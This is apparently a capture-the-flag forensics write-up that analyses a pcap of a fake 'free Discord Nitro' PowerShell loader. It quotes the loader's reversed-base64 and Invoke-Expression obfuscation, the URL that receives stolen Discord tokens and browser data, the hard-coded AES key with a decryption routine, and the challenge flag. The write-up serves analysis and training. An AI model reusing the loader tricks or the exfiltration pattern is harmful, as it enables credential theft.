Fake Boost
Challenge Description :
In the shadow of The Fray, a new test called "Fake Boost" whispers promises of free Discord Nitro perks. It's a trap, set in a world where nothing comes without a cost. As factions clash and alliances shift, the truth behind Fake Boost could be the key to survival or downfall. Will your faction see through the deception? KORP™ challenges you to discern reality from illusion in this cunning trial.
We have a pcap file to analyze. First, let's open it in Wireshark and look at the Protocol Hierarchy under the Statistics tab,
and we can see HTTP traffic.

So let's filter by http: we have two interesting endpoints.

Let's start with the first one, /freediscordnitro:
right click and Follow HTTP Stream,
and we can see that this endpoint serves a PowerShell script called discordnitro.ps1.
$s0yAY2gmHVNFd7QZ = $jozeq3n.ToCharArray()
: This line converts the variable $jozeq3n into an array of characters and assigns it to $s0yAY2gmHVNFd7QZ.
[array]::Reverse($s0yAY2gmHVNFd7QZ)
: This reverses the order of the elements in the array.
-join $s0yAY2gmHVNFd7QZ 2>&1> $null;
: This line joins the array elements back into a single string and discards the output, errors included, by redirecting it to $null.
$LOaDcODEoPX3ZoUgP2T6cvl3KEK = [sYSTeM.TeXt.ENcODING]::UTf8.geTSTRiNG([SYSTEm.cOnVeRT]::FRoMBaSe64sTRing("$s0yAY2gmHVNFd7QZ"))
: This line base64-decodes the reversed string stored in $s0yAY2gmHVNFd7QZ and stores the resulting UTF-8 text in $LOaDcODEoPX3ZoUgP2T6cvl3KEK.
$U9COA51JG8eTcHhs0YFxrQ3j = "Inv"+"OKe"+"-EX"+"pRe"+"SSI"+"On"
: This line builds the string "Invoke-Expression" from fragments, so the cmdlet name never appears whole in the file.
New-alIaS -Name pWn -VaLuE $U9COA51JG8eTcHhs0YFxrQ3j -FoRcE
: This line creates an alias pWn for the command Invoke-Expression.
pWn $lOADcODEoPX3ZoUgP2T6cvl3KEK
: This line invokes the decoded PowerShell code stored in $LOaDcODEoPX3ZoUgP2T6cvl3KEK.
So we execute the PowerShell script only up to the 4th line (the base64 decode), since the remaining lines run the decoded code through Invoke-Expression,
copying the lines one by one into a PowerShell prompt.
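The same first four stages can be reproduced statically instead of being pasted into a PowerShell prompt. The following Python is an added example, not part of the original writeup or of discordnitro.ps1; the stage-2 snippet it decodes is a constructed stand-in for the real $jozeq3n value, which is not reproduced here. It also folds the "Inv"+"OKe"+... string splitting before scanning, so the Invoke-Expression alias trick from the script above does not hide the execution primitive.

```python
import base64
import re

# Constructed stand-in for the loader's $jozeq3n: a harmless stage-2 snippet
# that mirrors the page's tricks (split "Invoke-Expression" string, New-Alias,
# hard-coded exfil URL), base64-encoded and then reversed. The real value
# from the pcap is not reproduced here.
STAGE2_PLAIN = ('$u = "Inv"+"OKe"+"-EX"+"pRe"+"SSI"+"On"; '
                'New-Alias -Name pWn -Value $u -Force; '
                '$c2 = "http://192.168.116.135:8080/rj1893rj1joijdkajwda"')
JOZEQ3N = base64.b64encode(STAGE2_PLAIN.encode()).decode()[::-1]

EXEC_PRIMITIVES = re.compile(r'invoke-expression|\biex\b|new-alias', re.IGNORECASE)
URLS = re.compile(r'https?://[^\s"\']+')
CONCAT = re.compile(r'"([^"]*)"\s*\+\s*"([^"]*)"')


def unpack_stage(reversed_b64: str) -> str:
    """Static equivalent of the loader's first four lines: reverse the
    character array, base64-decode, UTF-8 decode. Nothing is executed."""
    raw = base64.b64decode(reversed_b64[::-1], validate=True)
    return raw.decode("utf-8")


def fold_concat(script: str) -> str:
    """Collapse "a"+"b"+"c" chains into one literal so that keyword
    scanning is not defeated by string splitting."""
    while True:
        folded = CONCAT.sub(r'"\1\2"', script)
        if folded == script:
            return folded
        script = folded


def triage(reversed_b64: str) -> dict:
    """Decode one stage and report what an analyst wants to know before
    deciding whether to dig further (or to run anything at all)."""
    script = fold_concat(unpack_stage(reversed_b64))
    return {
        "script": script,
        "urls": URLS.findall(script),
        "exec_primitives": sorted({m.lower() for m in EXEC_PRIMITIVES.findall(script)}),
    }


if __name__ == "__main__":
    for key, value in triage(JOZEQ3N).items():
        print(f"{key}: {value}")
```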

Copy the whole PowerShell script into Notepad++ or any text editor to analyze the code.
In brief, this code is malicious: it steals Discord tokens and other sensitive information from various locations on the user's system, including web browser data directories. It then attempts to retrieve Discord user information using these stolen tokens. Additionally, it generates Discord Nitro codes and sends the stolen information, encrypted, to the URL http://192.168.116.135:8080/rj1893rj1joijdkajwda
So we have to get the encryptedData that was sent and try to decrypt it. Earlier, in the Wireshark HTTP traffic, we saw two interesting endpoints: the first one was used to download the malicious PowerShell script, and the second one, /rj1893rj1joijdkajwda,
is used by the malicious script to send the encryptedData stolen from the victim.

Right click, Follow HTTP Stream on this endpoint, and we can see the encryptedData that was sent.

To decrypt this we have to reverse the encryption logic of the malicious discordnitro.ps1
PowerShell script:
function Decrypt-String($key, $encryptedBase64) {
    # The blob is base64(IV || ciphertext): the first 16 bytes are the IV
    $fullData = [System.Convert]::FromBase64String($encryptedBase64)
    $iv = $fullData[0..15]
    $encryptedData = $fullData[16..($fullData.Length - 1)]
    $aesManaged = Create-AesManagedObject $key $iv "CBC" # Ensure the mode is correct
    $decryptor = $aesManaged.CreateDecryptor()
    $decryptedData = $decryptor.TransformFinalBlock($encryptedData, 0, $encryptedData.Length)
    [System.Text.Encoding]::UTF8.GetString($decryptedData)
}

function Create-AesManagedObject($key, $IV, $mode) {
    $aesManaged = New-Object "System.Security.Cryptography.AesManaged"
    # Setting the mode according to the provided mode parameter
    if ($mode -eq "CBC") { $aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC }
    elseif ($mode -eq "CFB") { $aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CFB }
    elseif ($mode -eq "CTS") { $aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CTS }
    elseif ($mode -eq "ECB") { $aesManaged.Mode = [System.Security.Cryptography.CipherMode]::ECB }
    elseif ($mode -eq "OFB") { $aesManaged.Mode = [System.Security.Cryptography.CipherMode]::OFB }
    $aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aesManaged.BlockSize = 128
    $aesManaged.KeySize = 256
    # Key and IV may be passed either as base64 strings or as raw byte arrays
    if ($IV) {
        if ($IV.GetType().Name -eq "String") {
            $aesManaged.IV = [System.Convert]::FromBase64String($IV)
        }
        else {
            $aesManaged.IV = $IV
        }
    }
    if ($key) {
        if ($key.GetType().Name -eq "String") {
            $aesManaged.Key = [System.Convert]::FromBase64String($key)
        }
        else {
            $aesManaged.Key = $key
        }
    }
    $aesManaged
}

# encryptedData is the value captured from the /rj1893rj1joijdkajwda request
$encryptedData = "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"
# AES_KEY is the hard-coded key from discordnitro.ps1 (base64 of a 32-byte key, i.e. AES-256)
$AES_KEY = "Y1dwaHJOVGs5d2dXWjkzdDE5amF5cW5sYUR1SWVGS2k="
# Decrypt the encrypted data
$decryptedData = Decrypt-String -key $AES_KEY -encryptedBase64 $encryptedData
# Output the decrypted data
Write-Host "Decrypted data:"
Write-Host $decryptedData
Executing this script recovers the victim data in plaintext.

The Email value is base64 encoded, so decoding it yields part of the flag,

and this part of the flag hints that the other part will be too easy to find. Looking at the malicious PowerShell script discordnitro.ps1,
we can find an unused variable called $part1
which holds a base64 encoded value; decoding it yields the first part of the flag.

Flag :
HTB{fr33_N17r0G3n_3xp053d!_b3W4r3_0f_T00_g00d_2_b3_7ru3_0ff3r5}